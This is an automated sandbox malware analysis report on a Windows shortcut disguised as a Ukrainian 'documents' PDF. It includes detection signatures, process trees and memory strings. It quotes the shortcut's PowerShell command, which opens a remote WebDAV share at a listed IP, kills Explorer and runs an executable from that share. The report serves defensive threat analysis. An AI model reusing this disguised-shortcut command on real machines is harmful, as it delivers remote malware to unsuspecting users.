Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
#U0414#U043e#U043a#U0443#U043c#U0435#U043d#U0442#U0438.pdf.lnk

Overview

General Information

Sample name:#U0414#U043e#U043a#U0443#U043c#U0435#U043d#U0442#U0438.pdf.lnk
renamed because original name is a hash value
Original sample name:.pdf.lnk
Analysis ID:1560046
MD5:cffb40e13e3aa6761330090b42314c36
SHA1:eb73790a82578588c0080175f8ac215025e57389
SHA256:330d36e248881a0a24a7d0612f3ac9a5a24cc960b36c2fe9ba0d63941b12fc18
Tags:lnkUKRuser-smica83
Infos:

Detection

Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Windows shortcut file (LNK) starts blacklisted processes
Opens network shares
Query firmware table information (likely to detect VMs)
Suspicious powershell command line found
Uses an obfuscated file name to hide its real file extension (double extension)
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device

Classification

  • System is w10x64
  • powershell.exe (PID: 2640 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "explorer '\\77.105.161.194@80\file\'"; Start-Sleep -Seconds 1; Stop-Process -Name explorer; \\77.105.161.194@80\file\6706e721f2c06.exe MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 5820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • explorer.exe (PID: 5544 cmdline: "C:\Windows\explorer.exe" \\77.105.161.194@80\file\ MD5: 662F4F92FDE3557E86D110526BB578D5)
  • explorer.exe (PID: 7148 cmdline: explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
  • svchost.exe (PID: 3636 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
No configs have been found
No yara matches
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "explorer '\\77.105.161.194@80\file\'"; Start-Sleep -Seconds 1; Stop-Process -Name explorer; \\77.105.161.194@80\file\6706e721f2c06.exe, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "explorer '\\77.105.161.194@80\file\'"; Start-Sleep -Seconds 1; Stop-Process -Name explorer; \\77.105.161.194@80\file\6706e721f2c06.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "explorer '\\77.105.161.194@80\file\'"; Start-Sleep -Seconds 1; Stop-Process -Name explorer; \\77.105.161.194@80\file\6706e721f2c06.exe, ProcessId: 2640, ProcessName: powershell.exe
Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 3636, ProcessName: svchost.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: #U0414#U043e#U043a#U0443#U043c#U0435#U043d#U0442#U0438.pdf.lnkReversingLabs: Detection: 23%

Networking

barindex
Source: C:\Windows\explorer.exeNetwork Connect: 77.105.161.194 80Jump to behavior
Source: Joe Sandbox ViewASN Name: ICOMF-ASRU ICOMF-ASRU
Source: unknownTCP traffic detected without corresponding DNS query: 77.105.161.194
Source: unknownTCP traffic detected without corresponding DNS query: 77.105.161.194
Source: unknownTCP traffic detected without corresponding DNS query: 77.105.161.194
Source: unknownTCP traffic detected without corresponding DNS query: 77.105.161.194
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficDNS traffic detected: DNS query: api.msn.com
Source: explorer.exe, 00000002.00000002.1709940016.00000000011F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.105.161.194/
Source: explorer.exe, 00000002.00000002.1709940016.00000000011F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.105.161.194/%
Source: explorer.exe, 00000002.00000002.1709940016.00000000011F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.105.161.194/)
Source: explorer.exe, 00000002.00000002.1709940016.00000000011F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.105.161.194/i
Source: explorer.exe, 00000002.00000002.1709940016.00000000011F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.105.161.194:80/
Source: explorer.exe, 00000003.00000003.1770312521.00000000087C0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1767052707.00000000087C0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3817790448.00000000087C0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4134236679.00000000087C0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1775141662.00000000087C0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2973453870.00000000087C0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1768180926.00000000087C0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1769205502.00000000087C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: svchost.exe, 00000004.00000002.3389637968.00000284B0400000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
Source: explorer.exe, 00000003.00000003.1770312521.00000000087C0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1767052707.00000000087C0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3817790448.00000000087C0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4134236679.00000000087C0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1775141662.00000000087C0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2973453870.00000000087C0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1768180926.00000000087C0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1769205502.00000000087C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 00000003.00000003.1770312521.00000000087C0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1767052707.00000000087C0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3817790448.00000000087C0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4134236679.00000000087C0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1775141662.00000000087C0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2973453870.00000000087C0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1768180926.00000000087C0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1769205502.00000000087C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: svchost.exe, 00000004.00000003.1722938583.00000284B0618000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.dr, edb.log.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: edb.log.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
Source: edb.log.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: edb.log.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: svchost.exe, 00000004.00000003.1722938583.00000284B0618000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.dr, edb.log.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: svchost.exe, 00000004.00000003.1722938583.00000284B0618000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.dr, edb.log.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: svchost.exe, 00000004.00000003.1722938583.00000284B064D000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.dr, edb.log.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.4.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: explorer.exe, 00000003.00000003.1770312521.00000000087C0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1767052707.00000000087C0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3817790448.00000000087C0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4134236679.00000000087C0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1775141662.00000000087C0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2973453870.00000000087C0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1768180926.00000000087C0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1769205502.00000000087C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000003.00000003.3817790448.00000000088D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4134236679.00000000088D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2973453870.00000000088D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.mi
Source: explorer.exe, 00000003.00000003.3817790448.00000000088D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4134236679.00000000088D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2973453870.00000000088D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.micr
Source: explorer.exe, 00000003.00000002.4131022655.00000000047F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/Vh5j3k
Source: explorer.exe, 00000003.00000002.4131022655.00000000047F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirm
Source: explorer.exe, 00000003.00000003.3817790448.000000000882B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1770312521.000000000882B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2973453870.000000000882B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1767052707.000000000882B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1775141662.000000000882B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4134236679.000000000882B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1768180926.000000000882B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000003.00000003.3817790448.000000000882B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1770312521.000000000882B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2973453870.000000000882B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1767052707.000000000882B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1775141662.000000000882B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4134236679.000000000882B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1768180926.000000000882B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/1$1
Source: explorer.exe, 00000003.00000003.1793770874.000000000883C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000003.00000003.1770312521.00000000087C0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1767052707.00000000087C0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3817790448.00000000087C0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4134236679.00000000087C0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1775141662.00000000087C0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2973453870.00000000087C0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1768180926.00000000087C0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1769205502.00000000087C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
Source: explorer.exe, 00000003.00000002.4131022655.00000000047F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
Source: explorer.exe, 00000003.00000002.4132522253.0000000004C7C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4131022655.00000000047F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 00000003.00000003.1771143250.00000000086E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1768023458.00000000086ED000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4134061332.00000000086C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2976055022.00000000086C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
Source: explorer.exe, 00000003.00000002.4131022655.00000000047F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
Source: explorer.exe, 00000003.00000002.4131022655.00000000047F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 00000003.00000002.4131022655.00000000047F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
Source: explorer.exe, 00000003.00000002.4131022655.00000000047F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
Source: explorer.exe, 00000003.00000002.4131022655.00000000047F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 00000003.00000002.4131022655.00000000047F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 00000003.00000002.4131022655.00000000047F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
Source: explorer.exe, 00000003.00000002.4131022655.00000000047F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
Source: explorer.exe, 00000003.00000002.4131022655.00000000047F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
Source: explorer.exe, 00000003.00000002.4131022655.00000000047F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
Source: explorer.exe, 00000003.00000003.1770312521.000000000887E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1771280620.000000000887E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1768583338.000000000887E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1774936994.000000000887E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1767052707.000000000887E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1782359564.000000000887E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1767560781.000000000887E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
Source: svchost.exe, 00000004.00000003.1722938583.00000284B06C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.dr, edb.log.4.drString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
Source: edb.log.4.drString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
Source: edb.log.4.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
Source: edb.log.4.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: svchost.exe, 00000004.00000003.1722938583.00000284B06C2000.00000004.00000800.00020000.00000000.sdmp, edb.log.4.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
Source: explorer.exe, 00000003.00000002.4131022655.00000000047F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 00000003.00000002.4131022655.00000000047F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
Source: explorer.exe, 00000003.00000002.4131022655.00000000047F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
Source: explorer.exe, 00000003.00000002.4131022655.00000000047F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
Source: explorer.exe, 00000003.00000002.4131022655.00000000047F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
Source: explorer.exe, 00000003.00000002.4131022655.00000000047F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
Source: svchost.exe, 00000004.00000003.1722938583.00000284B06C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.dr, edb.log.4.drString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
Source: edb.log.4.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
Source: explorer.exe, 00000003.00000003.1770312521.000000000887E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1771280620.000000000887E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1768583338.000000000887E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1774936994.000000000887E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1767052707.000000000887E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1782359564.000000000887E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1767560781.000000000887E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
Source: explorer.exe, 00000003.00000003.1767052707.00000000088D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1769205502.00000000088D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1774936994.00000000088D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1775834386.00000000088D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.come
Source: explorer.exe, 00000003.00000002.4131022655.00000000047F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
Source: explorer.exe, 00000003.00000002.4131022655.00000000047F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000003.00000002.4131022655.00000000047F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000003.00000003.1770312521.000000000887E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1771280620.000000000887E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1768583338.000000000887E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1774936994.000000000887E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1767052707.000000000887E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1782359564.000000000887E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1767560781.000000000887E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://word.office.com(
Source: explorer.exe, 00000003.00000002.4131022655.00000000047F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
Source: explorer.exe, 00000003.00000002.4131022655.00000000047F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
Source: explorer.exe, 00000003.00000002.4131022655.00000000047F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
Source: explorer.exe, 00000003.00000002.4131022655.00000000047F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
Source: explorer.exe, 00000003.00000002.4131022655.00000000047F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
Source: explorer.exe, 00000003.00000002.4131022655.00000000047F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
Source: explorer.exe, 00000003.00000002.4131022655.00000000047F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
Source: explorer.exe, 00000003.00000002.4131022655.00000000047F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
Source: explorer.exe, 00000003.00000002.4131022655.00000000047F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
Source: explorer.exe, 00000003.00000002.4131022655.00000000047F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
Source: explorer.exe, 00000003.00000002.4131022655.00000000047F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
Source: explorer.exe, 00000003.00000002.4131022655.00000000047F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
Source: explorer.exe, 00000003.00000002.4131022655.00000000047F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
Source: explorer.exe, 00000003.00000002.4131022655.00000000047F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
Source: explorer.exe, 00000003.00000002.4131022655.00000000047F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
Source: classification engineClassification label: mal80.spyw.evad.winLNK@6/13@1/2
Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x000000000000002e.dbJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qv2hncff.ltq.ps1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\explorer.exe
Source: unknownProcess created: C:\Windows\explorer.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\explorer.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: #U0414#U043e#U043a#U0443#U043c#U0435#U043d#U0442#U0438.pdf.lnkReversingLabs: Detection: 23%
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "explorer '\\77.105.161.194@80\file\'"; Start-Sleep -Seconds 1; Stop-Process -Name explorer; \\77.105.161.194@80\file\6706e721f2c06.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\explorer.exe "C:\Windows\explorer.exe" \\77.105.161.194@80\file\
Source: unknownProcess created: C:\Windows\explorer.exe explorer.exe
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\explorer.exe "C:\Windows\explorer.exe" \\77.105.161.194@80\file\Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
